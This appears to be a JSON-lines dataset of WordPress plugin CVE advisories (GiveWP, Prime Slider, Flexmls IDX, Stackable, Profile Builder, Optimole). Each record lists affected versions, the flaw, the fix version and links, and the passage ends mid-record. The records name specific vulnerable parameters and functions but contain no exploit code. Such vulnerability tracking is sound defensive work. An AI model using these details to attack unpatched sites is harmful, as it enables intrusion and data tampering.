{"CVE_ID":"CVE-2024-4339","slug":"bdthemes-prime-slider-lite","versionImpact":"3.14.3","versionEndExcluding":"3.14.4","description":"The Prime Slider \u2013 Addons For Elementor (Revolution of a slider, Hero Slider, Ecommerce Slider) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the General widget in all versions up to, and including, 3.14.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.14.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6eba6056-e087-4347-ad36-96501ceb4cdd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6eba6056-e087-4347-ad36-96501ceb4cdd?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3080132%40bdthemes-prime-slider-lite%2Ftrunk&old=3079066%40bdthemes-prime-slider-lite%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3080132%40bdthemes-prime-slider-lite%2Ftrunk&old=3079066%40bdthemes-prime-slider-lite%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0863","slug":"flexmls-idx","versionImpact":"3.14.28","versionEndExcluding":"3.14.29","description":"The Flexmls\u00ae IDX Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'idx_frame' shortcode in all versions up to, and including, 3.14.27 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.14.29, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/flexmls-idx\\\/tags\\\/3.14.25\\\/flexmls_connect.php#L92\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/flexmls-idx\\\/tags\\\/3.14.25\\\/flexmls_connect.php#L92\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/flexmls-idx\\\/tags\\\/3.14.25\\\/lib\\\/base.php#L220\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/flexmls-idx\\\/tags\\\/3.14.25\\\/lib\\\/base.php#L220\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3251292%40flexmls-idx&new=3251292%40flexmls-idx&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3251292%40flexmls-idx&new=3251292%40flexmls-idx&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1c8e814b-3828-4b3f-a9ad-b3758ab9b109?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1c8e814b-3828-4b3f-a9ad-b3758ab9b109?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10552","slug":"flexmls-idx","versionImpact":"3.14.26","versionEndExcluding":"3.14.27","description":"The Flexmls\u00ae IDX Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018api_key\u2019 and 'api_secret' parameters in all versions up to, and including, 3.14.26 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The vulnerability was partially patched in version 3.14.25.","recommendation":"Update to version 3.14.27, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/flexmls-idx\\\/trunk\\\/views\\\/admin-intro-api.php#L22\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/flexmls-idx\\\/trunk\\\/views\\\/admin-intro-api.php#L22\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/flexmls-idx\\\/trunk\\\/views\\\/admin-intro-api.php#L30\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/flexmls-idx\\\/trunk\\\/views\\\/admin-intro-api.php#L30\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3226484\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3226484\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0624108b-cd60-4278-802d-d4853f73ec6a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0624108b-cd60-4278-802d-d4853f73ec6a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8719","slug":"flexmls-idx","versionImpact":"3.14.22","versionEndExcluding":"3.14.23","description":"The Flexmls\u00ae IDX Plugin plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via several parameters like 'MaxBeds' and 'MinBeds' in all versions up to, and including, 3.14.22 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 3.14.23, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aac3fb8e-9b92-4ed1-ac9f-50870d4c5c9f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aac3fb8e-9b92-4ed1-ac9f-50870d4c5c9f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3169439%40flexmls-idx&new=3169439%40flexmls-idx&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3169439%40flexmls-idx&new=3169439%40flexmls-idx&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3997","slug":"bdthemes-prime-slider-lite","versionImpact":"3.14.1","versionEndExcluding":"3.14.2","description":"The Prime Slider \u2013 Addons For Elementor (Revolution of a slider, Hero Slider, Ecommerce Slider) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Pagepiling widget in all versions up to, and including, 3.14.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.14.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8736fb91-d05c-4f7e-81ff-00dfa44961f5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8736fb91-d05c-4f7e-81ff-00dfa44961f5?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3074395\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3074395\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5941","slug":"give","versionImpact":"3.14.1","versionEndExcluding":"3.14.2","description":"The GiveWP \u2013 Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to unauthorized access and deletion of data due to a missing capability check on the 'handle_request' function in all versions up to, and including, 3.14.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to read attachment paths and delete attachment files.","recommendation":"Update to version 3.14.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/824ec2ba-b701-46e9-b237-53cd7d0e46da?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/824ec2ba-b701-46e9-b237-53cd7d0e46da?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/give\\\/tags\\\/3.12.0\\\/src\\\/DonorDashboards\\\/Tabs\\\/EditProfileTab\\\/AvatarRoute.php#L36\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/give\\\/tags\\\/3.12.0\\\/src\\\/DonorDashboards\\\/Tabs\\\/EditProfileTab\\\/AvatarRoute.php#L36\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3132247\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3132247\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5932","slug":"give","versionImpact":"3.14.1","versionEndExcluding":"3.14.2","description":"The GiveWP \u2013 Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.14.1 via deserialization of untrusted input from the 'give_title' parameter. This makes it possible for unauthenticated attackers to inject a PHP Object. The additional presence of a POP chain allows attackers to execute code remotely, and to delete arbitrary files.","recommendation":"Update to version 3.14.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/93e2d007-8157-42c5-92ad-704dc80749a3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/93e2d007-8157-42c5-92ad-704dc80749a3?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/give\\\/tags\\\/3.12.0\\\/includes\\\/login-register.php#L235\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/give\\\/tags\\\/3.12.0\\\/includes\\\/login-register.php#L235\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/give\\\/tags\\\/3.12.0\\\/includes\\\/process-donation.php#L420\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/give\\\/tags\\\/3.12.0\\\/includes\\\/process-donation.php#L420\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/give\\\/tags\\\/3.12.0\\\/vendor\\\/vendor-prefixed\\\/fakerphp\\\/faker\\\/src\\\/Faker\\\/ValidGenerator.php#L80\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/give\\\/tags\\\/3.12.0\\\/vendor\\\/vendor-prefixed\\\/fakerphp\\\/faker\\\/src\\\/Faker\\\/ValidGenerator.php#L80\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/give\\\/tags\\\/3.12.0\\\/vendor\\\/tecnickcom\\\/tcpdf\\\/tcpdf.php#L7861\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/give\\\/tags\\\/3.12.0\\\/vendor\\\/tecnickcom\\\/tcpdf\\\/tcpdf.php#L7861\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/give\\\/tags\\\/3.12.0\\\/src\\\/DonorDashboards\\\/Tabs\\\/EditProfileTab\\\/AvatarRoute.php#L51\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/give\\\/tags\\\/3.12.0\\\/src\\\/DonorDashboards\\\/Tabs\\\/EditProfileTab\\\/AvatarRoute.php#L51\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3132247\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3132247\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/blog\\\/2024\\\/08\\\/4998-bounty-awarded-and-100000-wordpress-sites-protected-against-unauthenticated-remote-code-execution-vulnerability-patched-in-givewp-wordpress-plugin\\\/\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/blog\\\/2024\\\/08\\\/4998-bounty-awarded-and-100000-wordpress-sites-protected-against-unauthenticated-remote-code-execution-vulnerability-patched-in-givewp-wordpress-plugin\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5977","slug":"give","versionImpact":"3.13.0","versionEndExcluding":"3.14.0","description":"The GiveWP \u2013 Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 3.13.0 via the 'handleRequest' function due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with GiveWP Worker-level access and above, to delete and update arbitrary posts.","recommendation":"Update to version 3.14.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2dca6c29-9f05-4d82-90e3-834f1dd8005a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2dca6c29-9f05-4d82-90e3-834f1dd8005a?source=cve\",\"refsource\":\"\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/give\\\/trunk\\\/src\\\/DonationForms\\\/V2\\\/Endpoints\\\/FormActions.php#L96\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/give\\\/trunk\\\/src\\\/DonationForms\\\/V2\\\/Endpoints\\\/FormActions.php#L96\",\"refsource\":\"\",\"tags\":[\"Patch\"]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3120745\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3120745\\\/\",\"refsource\":\"\",\"tags\":[\"Patch\"]}]"}
{"CVE_ID":"CVE-2024-5940","slug":"give","versionImpact":"3.13.0","versionEndExcluding":"3.14.0","description":"The GiveWP \u2013 Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'handle_request' function in all versions up to, and including, 3.13.0. This makes it possible for unauthenticated attackers to edit event ticket settings if the Events beta feature is enabled.","recommendation":"Update to version 3.14.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d3cda8d0-321c-4b15-980e-5ebf49fac367?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d3cda8d0-321c-4b15-980e-5ebf49fac367?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/give\\\/tags\\\/3.12.0\\\/src\\\/EventTickets\\\/Routes\\\/UpdateEvent.php#L81\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/give\\\/tags\\\/3.12.0\\\/src\\\/EventTickets\\\/Routes\\\/UpdateEvent.php#L81\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/give\\\/tags\\\/3.12.0\\\/src\\\/EventTickets\\\/Routes\\\/UpdateEventTicketType.php#L78\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/give\\\/tags\\\/3.12.0\\\/src\\\/EventTickets\\\/Routes\\\/UpdateEventTicketType.php#L78\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3120745\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3120745\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5939","slug":"give","versionImpact":"3.13.0","versionEndExcluding":"3.14.0","description":"The GiveWP \u2013 Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the 'setup_wizard' function in all versions up to, and including, 3.13.0. This makes it possible for unauthenticated attackers to read the setup wizard administrative pages.","recommendation":"Update to version 3.14.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a104f88b-deae-465d-b4c1-9a1fc78e5ee9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a104f88b-deae-465d-b4c1-9a1fc78e5ee9?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/give\\\/tags\\\/3.12.0\\\/src\\\/Onboarding\\\/Wizard\\\/Page.php#L78\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/give\\\/tags\\\/3.12.0\\\/src\\\/Onboarding\\\/Wizard\\\/Page.php#L78\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3120745\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3120745\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2314","slug":"profile-builder","versionImpact":"3.13.6","versionEndExcluding":"3.13.7","description":"The User Profile Builder \u2013 Beautiful User Registration Forms, User Profiles & User Role Editor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcodes in all versions up to, and including, 3.13.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.\r\nThe issue was partially patched in version 3.13.6 of the plugin, and fully patched in 3.13.7.","recommendation":"Update to version 3.13.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profile-builder\\\/tags\\\/3.13.4\\\/front-end\\\/logout.php#L9\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profile-builder\\\/tags\\\/3.13.4\\\/front-end\\\/logout.php#L9\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3268402\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3268402\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9ccf2b56-0355-43e6-a616-d06196e90972?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9ccf2b56-0355-43e6-a616-d06196e90972?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8760","slug":"stackable-ultimate-gutenberg-blocks","versionImpact":"3.13.6","versionEndExcluding":"3.13.7","description":"The Stackable \u2013 Page Builder Gutenberg Blocks plugin for WordPress is vulnerable to CSS Injection in all versions up to, and including, 3.13.6. This makes it possible for unauthenticated attackers to embed untrusted style information into comments resulting in a possibility of data exfiltration such as admin nonces with limited impact. These nonces could be used to perform CSRF attacks within a limited time window. The presence of other plugins may make additional nonces available, which may pose a risk in plugins that don't perform capability checks to protect AJAX actions or other actions reachable by lower-privileged users.","recommendation":"Update to version 3.13.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1fd0b13c-7447-45da-9608-80b7629d9bbf?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1fd0b13c-7447-45da-9608-80b7629d9bbf?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3158674%40stackable-ultimate-gutenberg-blocks%2Ftrunk&old=3156448%40stackable-ultimate-gutenberg-blocks%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3158674%40stackable-ultimate-gutenberg-blocks%2Ftrunk&old=3156448%40stackable-ultimate-gutenberg-blocks%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1507","slug":"bdthemes-prime-slider-lite","versionImpact":"3.13.3","versionEndExcluding":"3.13.4","description":"The Prime Slider \u2013 Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'title_tags' attribute of the Rubix widget in all versions up to, and including, 3.13.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.13.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/09f2cb22-07e2-4fe5-8c2a-9d4420ee26ed?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/09f2cb22-07e2-4fe5-8c2a-9d4420ee26ed?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3047591\\\/bdthemes-prime-slider-lite\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3047591\\\/bdthemes-prime-slider-lite\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1508","slug":"bdthemes-prime-slider-lite","versionImpact":"3.13.2","versionEndExcluding":"3.13.3","description":"The Prime Slider \u2013 Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'settings['title_tags']' attribute of the Mercury widget in all versions up to, and including, 3.13.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.13.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7da00af0-edd1-4c39-ae33-a0dc21bd25a2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7da00af0-edd1-4c39-ae33-a0dc21bd25a2?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3047591\\\/bdthemes-prime-slider-lite\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3047591\\\/bdthemes-prime-slider-lite\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6296","slug":"stackable-ultimate-gutenberg-blocks","versionImpact":"3.13.1","versionEndExcluding":"3.13.2","description":"The Stackable \u2013 Page Builder Gutenberg Blocks plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018data-caption\u2019 parameter in all versions up to, and including, 3.13.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.13.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e55742de-9eaf-48e4-8d5d-ea980dfa17cf?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e55742de-9eaf-48e4-8d5d-ea980dfa17cf?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/stackable-ultimate-gutenberg-blocks\\\/trunk\\\/dist\\\/frontend_image_lightbox.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/stackable-ultimate-gutenberg-blocks\\\/trunk\\\/dist\\\/frontend_image_lightbox.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3108514\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3108514\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12117","slug":"stackable-ultimate-gutenberg-blocks","versionImpact":"3.13.11","versionEndExcluding":"3.13.12","description":"The Stackable \u2013 Page Builder Gutenberg Blocks plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'title' parameter of the Button block in all versions up to, and including, 3.13.11 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.13.12, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3223387%40stackable-ultimate-gutenberg-blocks&new=3223387%40stackable-ultimate-gutenberg-blocks&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3223387%40stackable-ultimate-gutenberg-blocks&new=3223387%40stackable-ultimate-gutenberg-blocks&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bedc2254-29aa-46c5-8f85-47dd6affb42b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bedc2254-29aa-46c5-8f85-47dd6affb42b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4636","slug":"optimole-wp","versionImpact":"3.12.10","versionEndExcluding":"3.13.0","description":"The Image Optimization by Optimole \u2013 Lazy Load, CDN, Convert WebP & AVIF plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018allow_meme_types\u2019 function in versions up to, and including, 3.12.10 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.13.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/be88566d-fc84-442d-bb34-834ad9f4465b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/be88566d-fc84-442d-bb34-834ad9f4465b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/optimole-wp\\\/tags\\\/3.12.10\\\/inc\\\/admin.php#L1828\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/optimole-wp\\\/tags\\\/3.12.10\\\/inc\\\/admin.php#L1828\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3086306\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3086306\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12738","slug":"profile-builder","versionImpact":"3.12.9","versionEndExcluding":"3.13.0","description":"The User Profile Builder \u2013 Beautiful User Registration Forms, User Profiles & User Role Editor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via several user meta parameters in all versions up to, and including, 3.12.9 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page and clicks a link to show user meta.","recommendation":"Update to version 3.13.0, or a newer patched 